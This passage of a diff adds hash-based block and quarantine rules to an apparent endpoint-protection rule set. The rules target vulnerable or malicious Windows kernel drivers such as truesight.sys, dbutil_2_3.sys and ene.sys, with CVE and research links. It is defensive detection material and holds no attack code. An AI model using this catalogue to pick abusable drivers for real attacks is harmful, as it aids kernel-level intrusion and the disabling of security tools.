"comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7bffff0f-b5ae-5058-abb5-ff66b6f478c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499957Z", + "creation_date": 
"2026-03-23T11:45:31.499960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecdde68b3e543dee38dcccf9be2e180ffdb0feab69cc3ccb4e0b97f81cd14f51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c00cebd-5b5d-5844-b36e-8e9f50ed21d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605340Z", + "creation_date": "2026-03-23T11:45:29.605342Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "041604b952fd390eb6f23008ed2cb30dff4155d8854561719467b07ccf48702b", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c05d8d5-c3dd-54f4-bb12-0a3336ad0301", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607147Z",
+ "creation_date": "2026-03-23T11:45:29.607149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607154Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c088a97-8e38-52c0-a0d6-de5ac4bd0efe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830446Z",
+ "creation_date": "2026-03-23T11:45:31.830448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01e8b9d3ab61de6d120ea4f99e362533a297c929519f7c4c3df06e707f52958d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c09e0af-0d08-5e83-99d4-f4b9dea813a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973112Z",
+ "creation_date": "2026-03-23T11:45:29.973114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f276197c07995a51ab703f1c96bb9fc45db244c0c5ef8a2d160c6db6f3e38947",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c0a3c6d-4f3b-5b50-84a5-33cbb7946bc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147500Z",
+ "creation_date": "2026-03-23T11:45:31.147502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f444505502eaf2f1c0ef864b5e24f86d38a3c443244463eb003718eab66f35d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c11dc99-ca07-50ed-8a7e-3ea7ae89a69d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826066Z",
+ "creation_date": "2026-03-23T11:45:31.826068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd2a2a3ce64c455ade0980cc9c5100593f27b6ecdda33bba51884412f011bdb8",
+ "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c124c64-059e-5c55-b584-e4bbe08dc6b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615867Z", + "creation_date": "2026-03-23T11:45:29.615880Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615885Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2018ad5f3695295599f756caf556722291485cd67eb9c3f7ec701b206cca4e00", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c1695f6-5324-5704-ba5e-1e5964685563", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830205Z", + "creation_date": "2026-03-23T11:45:30.830207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39665ac910c4ed6526bc92452d231f752289db6dc324de6c4ba6e8693bf15f00", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c19ecb4-9bff-53b8-b119-28d42709d3c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968221Z", + "creation_date": "2026-03-23T11:45:29.968223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38c18db050b0b2b07f657c03db1c9595febae0319c746c3eede677e21cd238b0", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c1de419-13c2-52db-bf7f-034f1e538aea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832986Z", + "creation_date": "2026-03-23T11:45:30.832989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45298a81ff6b22e7f578f939559bac22a9ed907e0e64550a623903de6ecec98e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c1fb99f-5a5c-5654-9f6a-4619a0313abc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836029Z", + "creation_date": "2026-03-23T11:45:30.836031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "674a250422906f220f76af3631cf093ea1db13b47401f0f0cd66c484186829c2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c27d188-6bb8-5537-b22c-f75383a2d319", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461211Z", + "creation_date": "2026-03-23T11:45:30.461214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461223Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af10796af9886b896de11d9067ed2b1569e48e0a5a8cacbc06bc50a533d8bec8", + "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c29ae6f-588d-5484-b6d7-73e40ba1f4d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616496Z", + "creation_date": "2026-03-23T11:45:29.616499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c37fe24-c1ed-530c-aa17-90d2a263e0b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159943Z", + "creation_date": "2026-03-23T11:45:31.159952Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159961Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61401cb144607a6d805877ef659049461afc2376351011206b34216d743dce63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c3b76f4-4456-5169-8852-bdc4b34182d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823088Z", + "creation_date": "2026-03-23T11:45:30.823090Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e7b92e6a1f656a70ed56ef2a190fce6bb3f12063b891fbfd722ca4e951de15f", + "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c43c7e1-90a7-5a28-8033-7075f6503569", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471963Z", + "creation_date": "2026-03-23T11:45:31.471966Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471974Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ab9c0033fe779dba2bf6f906ab9efff7ae2ba6c89616b8a4529c9e74bf7a388", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c5d9dc9-affa-5db5-bfa8-fbd0cf5488fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498759Z", + "creation_date": "2026-03-23T11:45:31.498761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4888e5bb988e9b5058dfe0231c2ceb7a2312a24a8451b1171a45941ff82f41d6", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c6346cd-6873-5155-9a29-9b96ef8fd4bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809236Z", + "creation_date": "2026-03-23T11:45:31.809239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "857e860762ee61ba6c1830fe0535c2c252e41facfba7237afc32def9a5338257", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c70c1ba-d5cb-57db-8b8b-719fa836280e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979481Z", + "creation_date": "2026-03-23T11:45:29.979483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6f764c3b5580cd1675cbf184938ad5a201a8c096607857869bd7c3399df0d12", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c72b120-df7a-56cc-8d96-efe81acea998", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610014Z", + "creation_date": "2026-03-23T11:45:29.610016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610022Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "253ed7f5c7115e957dfdb1f5c6c51592b491a70b27787903c8fd848e45b9cf22", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c73769b-76b1-58fc-836f-3d4257efc14b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807310Z", + "creation_date": "2026-03-23T11:45:31.807312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db4acfc49be21a6fa503473ab2fd5573660f9c426f57de54f99c1b69ab634d42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c839334-c76e-57f0-b0e6-59d085100b28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812674Z", + "creation_date": "2026-03-23T11:45:31.812678Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812687Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4610c4d17ba378f06dd4fe2ad8be4d9c49c5a27185fe36b29afc9f9c39330df0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c855a93-006c-5a14-86cb-3feb502b6bef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833810Z", + "creation_date": "2026-03-23T11:45:30.833813Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d373400b4c6093dc6c06d5228d6f5419d16e1084c7ee2748e867e8acfc36e635", + "comment": "Vulnerable Adlice Software 